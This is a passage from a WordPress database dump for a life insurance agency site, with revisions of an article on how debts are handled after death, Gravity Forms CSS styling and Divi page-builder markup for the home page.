Debts? Retrieved from <a href=\"https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. Real Insurance. (2018, August 6). Understanding How Debt Impacts Life Insurance Payouts. Retrieved from <a href=\"https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance</a></span></em>','Debt After Death: As A Policy Beneficiary, What Do I Have To Do?','','inherit','closed','closed','','345-revision-v1','','','2023-03-14 14:22:22','2023-03-14 14:22:22','',345,'http://cmdev-site1.com/?p=347',0,'revision','',0),(355,1,'2023-03-15 12:00:16','2023-03-15 12:00:16','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}	\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-15 12:00:16','2023-03-15 12:00:16','',35,'http://cmdev-site1.com/?p=355',0,'revision','',0),(354,1,'2023-03-15 10:30:45','2023-03-15 10:30:45','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    font-size: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 30px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}	\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-15 10:30:45','2023-03-15 10:30:45','',35,'http://cmdev-site1.com/?p=354',0,'revision','',0),(350,3,'2023-04-09 12:43:28','2023-04-09 12:43:28','','FAQ','','trash','closed','closed','','__trashed','','','2023-04-09 12:43:28','2023-04-09 12:43:28','',0,'http://cmdev-site1.com/?page_id=350',0,'page','',0),(351,3,'2023-03-14 15:47:25','2023-03-14 15:47:25','','FAQ','','inherit','closed','closed','','350-revision-v1','','','2023-03-14 15:47:25','2023-03-14 15:47:25','',350,'http://cmdev-site1.com/?p=351',0,'revision','',0),(353,3,'2023-03-19 17:36:09','2023-03-19 17:36:09','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\n\nThe tragedy of a loved one’s passing brings so many burdens to the surviving family members: grief, fatigue, and financial questions.\n\nYou have to plan and have a funeral and then somehow deal with the overwhelming task of notifying creditors of their passing.\n\nThen there’s the life insurance. Does it have to pay the outstanding debts of the decedent? How does all of this work?\n<span style=\"color: #ffffff;\">-</span>\n<h4>Who Is Responsible For The Debts of the Deceased?</h4>\nWhen someone dies, their estate (everything owned at the time of death) may go into probate, during which the will is reviewed, and the administration of the estate is handled.<sup>1</sup>\n\nThe estate is generally responsible to meet the obligations of the deceased. However, other surviving family members may still be fiscally responsible if the deceased had co-signers on any loans or was married in a community property state and has a surviving spouse.\n\nInheritors of estate property, such as a house, car, boat, etc., that are subject to a nonrecourse debt are still required to either pay off any outstanding balance—sometimes by selling the property—or take over remaining payments until the debt has been paid in full.\n<span style=\"color: #ffffff;\">-</span>\n<h4>What is a Beneficiary?</h4>\nRetirement accounts and life insurance policies generally have someone named to receive or inherit the proceeds in the event of the owner’s death.\n\nThat person is called the “beneficiary.” Designating a beneficiary for these accounts not only clarifies your asset recipients but it also makes it easier for them to receive the proceeds and avoid waiting for the probate process to be completed.<sup>2\n<span style=\"color: #ffffff;\">-</span></sup>\n<h4>Beneficiaries and Their Responsibilities</h4>\nThankfully, if you are named the primary beneficiary—the person to whom the payout normally goes to in the event of the policyholder’s death—that money is yours and is not usually required to cover the insured’s remaining debts. There are exceptions, however.\n\nIf your name is listed on any existing debt, perhaps as a cosigner, or you live in a community property state, your current assets (including life insurance inheritance) may be subject to community property rules and taxes at the state level.\n\nAs of 2018, 9 states impose community property laws: Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, and Wisconsin.<sup>3</sup>\n\n“Community Property” is defined under the law of each individual state. To determine if life insurance proceeds are included in your state, you should seek legal advice specific to the state laws you are subject to.\n<figure>\n\n[caption id=\"\" align=\"alignleft\" width=\"250\"]<img class=\"article_image\" src=\"https://e806.globelifeinsurance.com/images/article_images/community-property-states.jpg\" alt=\"Debt After Death: As a Policy Beneficiary, What Do I Have To Do? | Globe Life\" width=\"250\" height=\"158\" /> <span style=\"font-size: 8pt;\">Community Property States by Legalskeptic - Own work, CC BY-SA 3.0, https://commons.wikimedia.org/w/index.php?curid=16037686</span>[/caption]\n\n<figcaption>Additionally, if the estate is paid as the beneficiary, the proceeds from any retirement accounts or life insurance policies would go to the estate itself versus an individual. In that case, the benefits can be used to pay any outstanding debt.<sup>2\n<span style=\"color: #ffffff;\">-</span>\n</sup>Additionally, a will can give the executor of an estate permission to cover certain obligations with the life insurance proceeds.<sup>4\n</sup><span style=\"color: #ffffff;\">-</span></figcaption></figure>\n<h4>Estate Planning</h4>\nPlanning ahead is one of the best choices you can make to protect your loved ones or help aging parents with estate organization.\n\nWhile life insurance beneficiaries are typically not required to use the money to pay off debts owed by the estate, things such as funeral costs may be their obligation and not that of the estate. Having a strategy in place can help provide peace of mind for those left behind.\n\nProtection against the unexpected is exactly what life insurance was designed to provide. It is imperative to have the right amount of insurance coverage that is best for you and your family.\n\nBut just as important is ensuring that the coverage you have and the designations you’ve chosen are the most suitable for any post-mortem debt and tax obligations. By having a plan in place, you can safeguard your family’s legacy and continue to have a positive influence on their futures.\n\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\n\n<em><span style=\"font-size: 8pt;\">Sources:\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet. (2018, May 8). What Happens to Your Debts After You Die. Retrieved from <a href=\"https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/</a>\n</span></em><em><span style=\"font-size: 8pt;\">2. Garber, Julie. (2018, October 20). When Life Insurance Is Part of an Estate. Retrieved from <a href=\"https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232</a>\n</span></em><em><span style=\"font-size: 8pt;\">3. Laurence, Bethany K. Debt and Marriage: When Do I Owe My Spouse’s Debts? Retrieved from <a href=\"https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html</a>\n</span></em><em><span style=\"font-size: 8pt;\">4. Real Insurance. (2018, August 6). Understanding How Debt Impacts Life Insurance Payouts. Retrieved from <a href=\"https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance</a></span></em>','Debt After Death: As A Policy Beneficiary, What Do I Have To Do?','','inherit','closed','closed','','345-autosave-v1','','','2023-03-19 17:36:09','2023-03-19 17:36:09','',345,'http://cmdev-site1.com/?p=353',0,'revision','',0),(357,1,'2023-03-15 12:05:11','2023-03-15 12:05:11','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}	\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-15 12:05:11','2023-03-15 12:05:11','',35,'http://cmdev-site1.com/?p=357',0,'revision','',0),(364,1,'2023-03-19 02:53:25','2023-03-19 02:53:25','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"child playing superhero\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>We\'re unlike other life insurance experiences you have had. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" admin_label=\"Text\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 02:53:25','2023-03-19 02:53:25','',138,'http://cmdev-site1.com/?p=364',0,'revision','',0),(367,1,'2023-03-19 02:58:50','2023-03-19 02:58:50','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We\'re unlike other life insurance experiences you have had. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text 